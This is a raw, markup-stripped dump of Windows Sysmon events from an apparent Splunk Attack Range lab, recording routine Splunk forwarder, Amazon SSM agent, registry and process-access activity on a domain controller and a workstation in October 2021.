AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50095-false10.0.1.12-8000- 354300x8000000000000000104518Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:21.339{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49607-false10.0.1.12-8000- 23542300x800000000000000082425Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:24.805{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA9051237F03F3237B0A1D633B92A6ED,SHA256=0CFA3FEDCC1631C33E90D5437D83A55B9146DD29A92A03EE4CC555EA124C4F14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104521Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:24.710{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E69FC0B2FCB27920A2AFF40E1F61B9BA,SHA256=620A30328BC4266989204FF658209918CA2A640E29F40ABB8C9612AD5F33ADD3,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000104520Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:24.082{58E9C193-ACA7-615A-1400-00000000FC01}940C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b8f5-0x53a94cee) 23542300x800000000000000082426Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:25.805{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3554BE46E1CFC34498EA6AA55F3F4FAD,SHA256=46ADDF03754446D814B8B891DC5E69534417C63F2E1C10D9E0F9FD7553FEDF4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104522Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:25.712{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A54BF70000608BABC30F737298FCD2CE,SHA256=5333135D9E517FBB9D8AEEE7E04C4F960525E9CBD06FFDA90B35E4CB47CF7540,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082427Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:26.867{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A21F9FA9C91AED866A955424B4FD9E17,SHA256=27442D1C11A66578861883FF96CE7E4A1CD5E1BD35637A0BD0640FB59481E1F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104523Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:26.712{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1536DFA5111293DAA9D7709E721BA050,SHA256=4EF7EB5E9C5F0B75EB362E7EA3F32C02202DAE026ADB0A64E5072766DEF47255,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082428Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:27.992{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CB2A2CDBE06F5ABD4BCBB496B842D49,SHA256=676BD41296E63FC3EEDFD0703D1E45BF03C8E6B3C713C023C6B80867347DAF3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104524Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:27.712{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4579B335485467455D76063502DF0BB9,SHA256=64D92D13EFBF1C81F8DD42FFD1FBB70FA7FE30EABCEA8C10CFD39D87FE745D68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082429Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:28.992{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7AA8CE33C5934D7C031698F9A5953B4,SHA256=C1744E13D0D31C42FF302BDCE3FACE47D6F68298DCCA79185D588A3454174BF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104526Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:28.712{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8242222124C7CD64BEFDC58BE3C5AEFC,SHA256=7A6FFA8C0DE962BA730DEA01260D4484D35558E53D9867A5DA5CED31B235CD1E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104525Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:26.417{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49608-false10.0.1.12-8000- 23542300x8000000000000000104529Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:29.934{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-028MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104528Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:29.713{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F588189125B7F6576E179D3F937A0758,SHA256=F7A95246909ACE0A646C8FC9B4079BFE87DA9D89216FEDD5771CBE8229C6DCAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082431Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:29.742{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082430Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:26.749{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50096-false10.0.1.12-8000- 10341000x8000000000000000104527Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:29.635{58E9C193-ACA5-615A-0B00-00000000FC01}628672C:\Windows\system32\lsass.exe{58E9C193-AC86-615A-0100-00000000FC01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x8000000000000000104533Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:30.949{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-029MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104532Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:30.729{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E47807AA8AF4A9B380F78F0F0FEBF9C7,SHA256=C36A7DB3D1911E45DB6C871EB143EA163F4A32EF0CC6B1E303087293E4A288B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082432Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:30.180{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFDD210076EBA7C4A3CA0FFD93D222C8,SHA256=92A66BC0791A8B8889DCB95726775AB75A4E24EBFECC4B7EC82B063D82128EF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104531Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:30.650{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6D2345F99E7FADE5F273CBD2EB13C0E,SHA256=873B706F8BD05E9639A2A7DC2330CE3F5FF2D4C21C27E553B8C4A724C3442553,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104530Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:30.650{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AFB85E30A9A9AEADC52C1CEB5252A95C,SHA256=560935BFE577C91D5F3BC7DEF6CA9351E237CFC953DD53873A6638DDBA3B4580,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082447Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:29.280{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50097-false10.0.1.12-8089- 10341000x800000000000000082446Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:31.383{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B3AF-615A-6C01-00000000FD01}1412C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082445Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:31.383{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082444Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:31.383{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082443Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:31.383{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082442Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:31.383{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082441Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:31.383{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082440Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:31.383{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082439Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:31.383{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082438Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:31.383{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082437Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:31.383{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082436Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:31.383{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B3AF-615A-6C01-00000000FD01}1412C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082435Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:31.383{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B3AF-615A-6C01-00000000FD01}1412C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082434Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:31.383{2FDD8D40-B3AF-615A-6C01-00000000FD01}1412C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082433Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:31.242{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CD509CADC5ADDF0396F1B6F77823789,SHA256=76E940F886DE6242E945DD047853CE1FB69BEB9E44003DABCEEB75F2B3BE3722,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104536Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:31.731{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program 